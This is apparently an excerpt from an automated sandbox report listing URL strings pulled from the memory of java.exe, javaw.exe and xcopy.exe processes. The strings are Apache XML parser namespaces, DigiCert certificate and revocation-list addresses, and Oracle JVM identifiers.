Source: javaw.exe, 00000001.00000003.1799791461.0000000014E3A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/validation/schema/normalized-valuenternalB
Source: java.exe, 00000004.00000002.2948370667.0000000004C46000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/validation/schemaS
Source: javaw.exe, 00000001.00000002.2961037370.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799237253.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799693718.0000000014E24000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799791461.0000000014E3A000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/internal/xinclude-handler9
Source: java.exe, 00000004.00000002.2948370667.0000000004C46000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/internal/xinclude-handler;
Source: javaw.exe, 00000001.00000002.2961037370.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799237253.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799693718.0000000014E24000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799791461.0000000014E3A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/ion
Source: javaw.exe, 00000001.00000002.2961037370.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799237253.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799693718.0000000014E24000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799791461.0000000014E3A000.00000004.00000020.00020000.00000000.sdmp, java.exe, java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009EAA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2948370667.0000000004C46000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/locale
Source: java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/localeJ
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp, java.exe, java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009EAA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2948370667.0000000004C46000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/schema/external-noNamespaceSchemaLocation
Source: java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/schema/external-noNamespaceSchemaLocation?
Source: javaw.exe, 00000001.00000002.2961037370.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799237253.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799693718.0000000014E24000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799791461.0000000014E3A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/schema/external-noNamespaceSchemaLocationonditi?
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp, java.exe, java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009EAA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2948370667.0000000004C46000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/schema/external-schemaLocation
Source: java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/schema/external-schemaLocationK
Source: javaw.exe, 00000001.00000002.2961037370.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799237253.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799693718.0000000014E24000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799791461.0000000014E3A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/schema/external-schemaLocationaK
Source: javaw.exe, 00000001.00000002.2961037370.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799237253.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799693718.0000000014E24000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799791461.0000000014E3A000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000003.1807345523.000000001510D000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009EAA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2948370667.0000000004C46000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957547371.000000001512C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/security-manager
Source: javaw.exe, 00000001.00000002.2961037370.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799237253.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799693718.0000000014E24000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799791461.0000000014E3A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/security-manager#
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp, java.exe, java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009EAA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2948370667.0000000004C46000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/validation/schema/root-element-declaration
Source: java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/validation/schema/root-element-declarationG
Source: javaw.exe, 00000001.00000002.2961037370.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799237253.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799693718.0000000014E24000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799791461.0000000014E3A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/validation/schema/root-element-declarationtack
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp, java.exe, java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009EAA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2948370667.0000000004C46000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/validation/schema/root-type-definition
Source: java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/validation/schema/root-type-definition(
Source: javaw.exe, 00000001.00000002.2961037370.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799237253.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799693718.0000000014E24000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799791461.0000000014E3A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/validation/schema/root-type-definitiont(
Source: javaw.exe, 00000001.00000003.1799791461.0000000014E3A000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009EAA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2948370667.0000000004C46000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/xmlschema/1.0/anonymousTypes
Source: java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/xmlschema/1.0/anonymousTypes(
Source: javaw.exe, 00000001.00000002.2956709894.00000000097A6000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009D91000.00000004.00000800.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1807146434.000000000229E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://bugreport.sun.com/bugreport/
Source: javaw.exe, 00000001.00000002.2956709894.00000000097E3000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009D95000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt
Source: javaw.exe, 00000001.00000002.2956709894.00000000097B2000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2956709894.0000000009778000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2948370667.0000000004A4B000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009D95000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009D71000.00000004.00000800.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1849055467.00000000022A0000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1849708734.00000000022A0000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1790732794.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1834640505.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1839145185.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1831479640.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1842865552.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1809404812.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1811402420.0000000002829000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1832702823.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1809302095.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1791757917.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1809046040.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1837580580.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1827004931.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 
00000012.00000003.1830851793.000000000229E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: xcopy.exe, 00000012.00000003.1791314402.000000000229E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSi3w
Source: xcopy.exe, 00000012.00000003.1791314402.000000000229E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSi3wD_
Source: xcopy.exe, 00000012.00000003.1849055467.00000000022A0000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1849708734.00000000022A0000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1790732794.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1834640505.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1809259600.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1839145185.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1831479640.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1842865552.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1809404812.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1811402420.0000000002829000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1832702823.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1809302095.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1791757917.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1809046040.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1837580580.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1827004931.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1830851793.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1785372831.000000000229D000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1842945665.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1833250324.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 
00000012.00000003.1789954778.000000000229D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: javaw.exe, 00000001.00000002.2956709894.00000000097E3000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009D95000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt
Source: javaw.exe, 00000001.00000002.2956709894.00000000097B2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2948370667.0000000004A4B000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009D95000.00000004.00000800.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1849055467.00000000022A0000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1849708734.00000000022A0000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1790732794.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1834640505.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1809259600.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1839145185.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1831479640.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1842865552.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1809404812.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1811402420.0000000002829000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1832702823.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1809302095.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1791757917.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1809046040.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1837580580.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1827004931.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1830851793.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 
00000012.00000003.1785372831.000000000229D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: javaw.exe, 00000001.00000002.2956709894.00000000097E3000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009D95000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt
Source: javaw.exe, 00000001.00000002.2956709894.00000000097B2000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2956709894.00000000097E3000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2948370667.0000000004A4B000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009D95000.00000004.00000800.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1849055467.00000000022A0000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1849708734.00000000022A0000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1790732794.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1834640505.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1809259600.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1839145185.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1831479640.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1842865552.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1809404812.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1811402420.0000000002829000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1832702823.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1809302095.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1791757917.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1809046040.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1837580580.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1827004931.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 
00000012.00000003.1830851793.000000000229E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: xcopy.exe, 00000012.00000003.1850623347.00000000022A0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://casper.beckman.uiuc.edu/~c-tsai4
Source: xcopy.exe, 00000012.00000003.1850623347.00000000022A0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://chasen.aist-nara.ac.jp/chasen/distribution.html
Source: javaw.exe, 00000001.00000002.2956709894.00000000097E3000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009D95000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl
Source: javaw.exe, 00000001.00000002.2956709894.00000000097B2000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2956709894.0000000009778000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2948370667.0000000004A4B000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009D95000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009D71000.00000004.00000800.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1849055467.00000000022A0000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1849708734.00000000022A0000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1790732794.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1834640505.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1839145185.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1831479640.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1842865552.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1809404812.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1811402420.0000000002829000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1832702823.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1809302095.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1791757917.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1809046040.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1837580580.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1827004931.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 
00000012.00000003.1830851793.000000000229E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: xcopy.exe, 00000012.00000003.1849055467.00000000022A0000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1849708734.00000000022A0000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1790732794.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1834640505.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1809259600.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1839145185.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1831479640.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1842865552.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1809404812.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1811402420.0000000002829000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1832702823.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1809302095.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1791757917.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1809046040.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1837580580.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1827004931.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1830851793.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1785372831.000000000229D000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1842945665.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1833250324.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 
00000012.00000003.1791314402.000000000229E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: javaw.exe, 00000001.00000002.2956709894.00000000097E3000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009D95000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl
Source: javaw.exe, 00000001.00000002.2956709894.00000000097B2000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2956709894.00000000097E3000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2948370667.0000000004A4B000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009D95000.00000004.00000800.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1849055467.00000000022A0000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1849708734.00000000022A0000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1790732794.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1834640505.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1809259600.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1839145185.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1831479640.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1842865552.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1809404812.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1811402420.0000000002829000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1832702823.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1809302095.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1791757917.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1809046040.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1837580580.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1827004931.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 
00000012.00000003.1830851793.000000000229E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: javaw.exe, 00000001.00000002.2956709894.00000000097E3000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009D95000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl
Source: xcopy.exe, 00000012.00000003.1837161328.000000000229E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: xcopy.exe, 00000012.00000003.1897644069.000000000229E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.oracle.com/hotspot/jfr-info/
Source: xcopy.exe, 00000012.00000003.1859565574.000000000229F000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1897644069.000000000229E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.oracle.com/hotspot/jvm/
Source: xcopy.exe, 00000012.00000003.1897644069.000000000229E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.oracle.com/hotspot/jvm/enable-errors
Source: xcopy.exe, 00000012.00000003.1897644069.000000000229E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.oracle.com/hotspot/jvm/enable-exceptions
Source: xcopy.exe, 00000012.00000003.1897644069.000000000229E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.oracle.com/hotspot/jvm/file-io-threshold
Source: xcopy.exe, 00000012.00000003.1897644069.000000000229E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.oracle.com/hotspot/jvm/socket-io-threshold
